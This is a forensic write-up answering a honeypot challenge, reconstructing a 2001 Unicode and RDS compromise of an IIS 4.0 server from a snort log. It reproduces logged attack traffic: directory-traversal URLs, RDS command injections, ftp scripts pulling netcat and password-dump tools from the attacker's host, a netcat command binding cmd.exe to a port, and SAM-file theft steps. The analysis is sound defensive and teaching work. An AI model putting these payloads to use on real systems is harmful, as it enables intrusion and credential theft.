Jon McKnight
jmcknight@kpmg.com
The Challenge:
On 4 Feb. 2001, the system 213.116.251.162 successfully attacked and compromised the honeypot 172.16.1.106, otherwise known as lab.wiretrip.net. We have reason to believe that the attacker knew this was a honeypot, however we decided to release this challenge as it examplifies the most common of NT attacks found in the wild. Your only source of information is the snort binary log file that captured the entire attack. You can download this in (.gz format, MD5=af1588ce7f7798190694addef3f148f7), or (.zip format, MD5=aca62e19ba49546d2bfd1fa1c71b5751). You will have to extract and analyze the information from this binary log file. Remember, entries will not only be judge on your answers, but how easy they are to read, and if you show how you obtained/conducted your analysis.
1.Which exploit(s) were used to attack the system?
Unicode and RDS
2.How were the exploits used to access and control the
system?
First he verified that it was Unicode vulerable then RDS. He tried to use RDS to create an ftp file that contained username, password and files (pdump.exe, samdump.exe, and nc.exe) that he wanted to download from a remote server. Everything worked correctly except that he had the wrong password for the ftp server. He could not see this so he assumed something was wrong.
He attempts an ftp connection to his own machine, this works. Next he tried to create and execute the ftp file via Unicode and it worked. Now he used Unicode to issue a command to the lab.wiretrip.net box to copy cmd.exe and rename it cmd1.exe. Then he used Unicode to bind cmd.exe to port 6969 with netcat. I am somewhat puzzled why he did this through Unicode as netcat will only be running as IUSR_machine. It would have been much less time consuming to use RDS to issue the netcat command.
3.What was done once
access was gained?
Johna used RDS to issue the pdump command. The output was piped to a file. This did not work however. At this time Johna also had an IUSER_machine level connection to lab.wiretrip.net via netcat. He issued a net users command via RDS, piped the output to a file and then viewed the contents via his Unicode netcat connection. He then adds a README.NOW.Hax0r file in an effort to alert the admin to patch the server.
Next Johna attempts to add the IUSR_Kenny account and the IWAM_Kenny account to the admin group. This will give Johna’s Unicode netcat connection administratives rights and allow him to view things like the sam._ file.
Now that his netcat connection is admin level he issues the net start command to see what services are running. Johna now attempts to add a user called testuser with the password UgotHacked. He is unsuccessful so he decides to update the sam._ file (using rdisk). He first tried this command from the netcat connection but that did not seem to work so he tries RDS. After a few tries it seems to work. Once the file is updated he then copies it to the C:\ dir into a file called har.txt. He loses his connection and reconnects. After verifying that the file has been successfully copied he then copies har.txt to wwwroot and views har.txt from his web browser. It is safe to assume that he copies the file into L0phtCrack and starts cracking the administrator password.
Twelve minutes later the gig is up, Johna figures out it is a honeypot. My guess is that the administrator’s password has been cracked and it gives him his clue. I would add that clue to the fact that one of RFP’s boxes is vulnerable to two exploits that he has received much press for (creating the msadc2.pl script and researching Unicode).
He changes IWAM_Kenny’s password to Snake69Snake69. He deletes har.txt from the wwwroot directory and apparently tells his friends on IRC to check out a box that he has hacked. This would flood the snort log (which it has done) and make it harder to sift through the data. I think he has mentioned that it is both Unicode and RDS vulnerable because a different box connects. This Linux box creates a file called test.txt using RDS. The contents of the file are “this can’t be true”.
I notice a bunch of different connections looking at the test.txt. This provides more evidence to the fact that he is communicating with friends over IRC. The Linux box seems to have told everyone else.
Johna creates a new ftp file, this time he wants to have lab.wiretrip.net send him whisker.tar.gz. While Johna was getting whisker, another nc connection was made to lab.wiretrip.net. It is possible this is Johna reconnecting, but at this point we cannot verify with the data that we have since we know other people are aware of the vulnerabilities.
Johna’s last action before the snort log ends is to delete the ftp file that he placed on the server earlier.
4.How could this
attack been prevented?
Applying the patches for Unicode and RDS
MS00-057 ("File permission canonicalization") for Unicode
http://www.microsoft.com/security/bulletins/MS99-025faq.asp for RDS
5.How much time did
you spend on this analysis and writeup?
14 hours
Bonus Question:
Do you feel that the
attacker in question knew if this was a honeypot? If so, why or why not?
Yes
At approximately 13:23 GMT Johna issues the following command
echo best honeypot
i've seen till now :) > rfp.txt
It seems he has figured out this was a honeypot. One of the most obvious reasons to me would be that lab.wiretrip.net is vulnerable to an exploit (RDS) that it's owner (RFP) developed. RFP also researched the Unicode exploit. I don't think it became apparent to Johna until around the time he issued the honeypot quote. I say this because he makes some other files like
Johna realized this was a honeypot after he had copied the current password file. It is possible that he cracked the password for the users on lab.wiretrip.net and one of the cracked passwords may have tipped him off.
Looks like they first tried Unicode to view the boot.ini file. It seems they used a script to automatically check for this vulnerability. There are so many out in the wild I have no idea which exact script.
GET
/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1
GET
/guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1
GET
/guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../boot.ini HTTP/1.1
GET
/guest/default.asp/..À¯../..À¯../..À¯../boot.ini HTTP/1.1
It seems the box is vulnerable. Success at 12:24:18
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 12:24:18 GMT
Content-Type: text/html
Cache-control: private
Transfer-Encoding: chunked
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows
NT Server, Enterprise Edition Version 4.00"
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows
NT Server, Enterprise Edition Version 4.00 [VGA mode]" /basevideo
/sos
GET /msadc/ HTTP/1.1
Accept: image/gif, image/x-xbitmap,
image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword,
application/vnd.ms-powerpoint, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0; Hotbar 2.0)
Host: lab.wiretrip.net
Connection: Keep-Alive
Cookie:
ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 12:25:31 GMT
Connection: close
Content-Type: text/html
Content-Length: 172
A professor once told me that written code is like a fingerprint. Looking at the snot log and then looking at the code in msadc2.pl I know that the snort log is showing me msadc2.pl being run.
Snort Log:
ADCClientVersion:01.06
Content-Type: multipart/mixed;
boundary=!ADM!ROX!YOUR!WORLD!; num-args=3
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: 366
msadac2.pl snippet:
ADCClientVersion:01.06
Content-Type: multipart/mixed;
boundary=!ADM!ROX!YOUR!WORLD!; num-args=3
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
First the intuder tests to see if the exploit works. He creates a file called fun with the word "werd" in it, in the C:\ directory.
c m d
/ c e c h o w e r d
> > c : \ f u n
Date: Sun, 04 Feb 2001 12:26:03 GMT
Now the inrtuder checks to see if the file has been created. The intruder uses the Unicode vulnerability to check. Looking at this signature again verifies that the intruder is using a Unicode script (well it doesn't verify 100%, but I have great certainty).
GET
/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun HTTP/1.1
GET
/guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../fun HTTP/1.1
GET
/guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../fun HTTP/1.1
GET /guest/default.asp/..À¯../..À¯../..À¯../fun HTTP/1.1
It seems the file is there because "werd" is printed out below. This means the server is vulnerable to RDS.
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 12:26:11 GMT
Content-Type: text/html
Cache-control: private
Transfer-Encoding: chunked
werd
c m d / c e c h o
u s e r j o h n a 2 k >
f t p c o m
Date: Sun, 04 Feb 2001 12:31:47 GMT
c m d / c e c h o
h a c k e r 2 0 0 0 >
> f t p c o m
Date: Sun, 04 Feb 2001 12:31:54 GMT
c m d / c e c h o
g e t s a m d u m p . d l
l > > f t p c o m
Date: Sun, 04 Feb 2001 12:32:01 GMT
c m d / c e c h o
g e t p d u m p . e x e > >
f t p c o m
Date: Sun, 04 Feb 2001 12:32:08 GMT
c m d / c e c h o
g e t n c . e x e > >
f t p c o m
Date: Sun, 04 Feb 2001 12:32:15 GMT
c m d / c e c h o
q u i t > > f t p c o m
Date: Sun, 04 Feb 2001 12:32:22 GMT
Now the intruder wants to tell the server to ftp to another box that has the files that the intruder needs. In this case the
server the intruder wants to ftp to is www.nether.net.
c m d / c f t p
- s : f t p c o m - n w w w . n e t h e r . n e t
Date: Sun, 04 Feb 2001 12:32:29 GMT
Doh! The intruder had a bad login.
220 freenet.nether.net FTP server (SunOS 5.7) ready.
USER johna2k
331 Password required for johna2k.
PASS hacker2000
530 Login incorrect.
PORT 172,16,1,106,12,64
530 Please login with USER and PASS.
RETR samdump.dll
530 Please login with USER and PASS.
RETR pdump.exe
530 Please login with USER and PASS.
RETR nc.exe
530 Please login with USER and PASS.
QUIT
221 Goodbye.
Not realizing that the FTP failed the intruder issues a command to run pdump and save the results in a file called new.pass.
After creating this file the intruder wants the server to ftp this file to the intruder's server at www.nether.net
c m d / c p d u m p . e x e > > n e w . p a s
s
Date: Sun, 04 Feb 2001 12:32:46 GMT
c m d / c e c h o
u s e r j o h n a 2 k >
f t p c o m 2
Date: Sun, 04 Feb 2001 12:32:56 GMT
c m d / c e c h o
h a c k e r 2 0 0 0 >
> f t p c o m 2
Date: Sun, 04 Feb 2001 12:33:03 GMT
c m d / c p u t
n e w . p a s s > > f t p c o m 2
Date: Sun, 04 Feb 2001 12:33:10 GMT
c m d / c e c h o
q u i t > > f t p c o m 2
Date: Sun, 04 Feb 2001 12:33:17 GMT
c m d / c f t p
- s : f t p c o m 2 - n w w w . n e t h e r . n e t
Date: Sun, 04 Feb 2001 12:33:24 GMT
Doh!Doh! Bad login again, but the intruder still does not know.
220 freenet.nether.net FTP server (SunOS 5.7) ready.
USER johna2k
331 Password required for johna2k.
PASS hacker2000
530 Login incorrect.
QUIT
221 Goodbye.
c m d
/ c f t p 2 1 3 . 1 1 6 . 2 5 1 . 1 6 2
Date: Sun, 04 Feb 2001 12:33:43 GMT
The intruder (Johna) connects to his server,
--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee
S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1),
on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
GET
/msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom
HTTP/1.1
Looks like this way works.
220--------H-A-C-K
T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb
Ram.
220 -------H-A-C-K
T-H-E P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,71
200 PORT Command successful.
RETR nc.exe
150 Opening ASCII mode data connection for nc.exe (59392 bytes).
Issues a command to copy cmd.exe to cmd1.exe using Unicode.
/msadc/..À¯../.../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe
HTTP/1.1
Now he tells netcat to bind cmd.exe to port 6969
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe
Success. NOTE: he is connected as IUSR not Administrator
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\Program Files\Common Files\system\msadc>
Now he looks to see if his files are there:
02/04/01 06:41a <DIR> .
02/04/01 06:41a <DIR> ..
09/25/97 07:41a 596 adcjavas.inc
09/25/97 07:41a 589 adcvbs.inc
04/30/97 11:00p 208,144 cmd1.exe
02/04/01 06:41a 98 ftpcom
09/25/97 08:28a 172,816 msadce.dll
09/25/97 08:16a 5,632 msadcer.dll
09/25/97 08:24a 23,312 msadcf.dll
09/25/97 08:24a 91,408 msadco.dll
09/25/97 08:19a 5,120 msadcor.dll
09/26/97 08:19a 42,256 msadcs.dll
02/04/01 06:41a 59,392 nc.exe
02/04/01 06:41a 32,768 pdump.exe
10/02/97 07:28a 19,388 readme.txt
02/04/01 06:41a 36,864 samdump.dll
16
File(s) 698,383 bytes
1,690,861,056 bytes free
C:\Program Files\Common Files\system\msadc>
pdump and samdump are there. So is cmd1.exe (which he copied earlier) and ftpcom.
Johna is excited so now he executes pdump using RDS and saves the output to a file called "yay.txt"
c m d
/ c C : \ P r o g r a m F i l e s \ C o m m o n F i l e s \ s y s t e m \ m s a d c \ p d u
m p . e x e > > y a y . t x t
Date: Sun, 04 Feb 2001 12:42:48 GMT
He deletes ftpcom and realizes that he needs to put the full path of pdump
c m d
/ c C : \ P r o g r a m F i l e s \ C o m m o n F i l e s \ s y s t e m \ m s a d c \ p d u
m p . e x e > > c : \ y a y . t x t
Date: Sun, 04 Feb 2001 12:43:32 GMT
That didn't work so he looks around the c:\ directory of lab.wiretrip.net.
He issues a net users command via RDS and pipes the output to heh.txt.
c m d / c n e t
u s e r s > > c : \ h e h
. t x t
Date: Sun, 04 Feb 2001 12:48:55 GMT
Using his Unicode netcat connection he checks to see if the file is there.
dir
Volume in drive C has no label.
Volume Serial Number is
8403-6A0E
Directory of C:\
11/26/00 12:34p 0 AUTOEXEC.BAT
11/26/00 06:57p 322 boot.ini
12/26/00 07:36p <DIR> exploits
02/04/01 06:48a 263 heh.txt
12/07/00 03:30p <DIR> InetPub
12/07/00 03:12p <DIR> Multimedia Files
12/26/00 07:10p <DIR> New Folder
01/26/01 02:10p 78,643,200 pagefile.sys
12/21/00 08:59p <DIR> Program Files
12/21/00 08:59p <DIR> TEMP
02/04/01 06:48a <DIR> WINNT
12/26/00 07:09p <DIR> wiretrip
02/04/01 06:43a 0 yay.txt
14
File(s) 78,643,785 bytes
1,690,861,056 bytes free
Now he issues the type command via his Unicode netcat connection to see the contents of heh.txt
User accounts for \\
-------------------------------------------------------------------------------
Administrator
Guest
IUSR_KENNY
IWAM_KENNY
The command completed with one or more errors.
He is kind enough to leave a file for the admin called README.NOW.Hax0r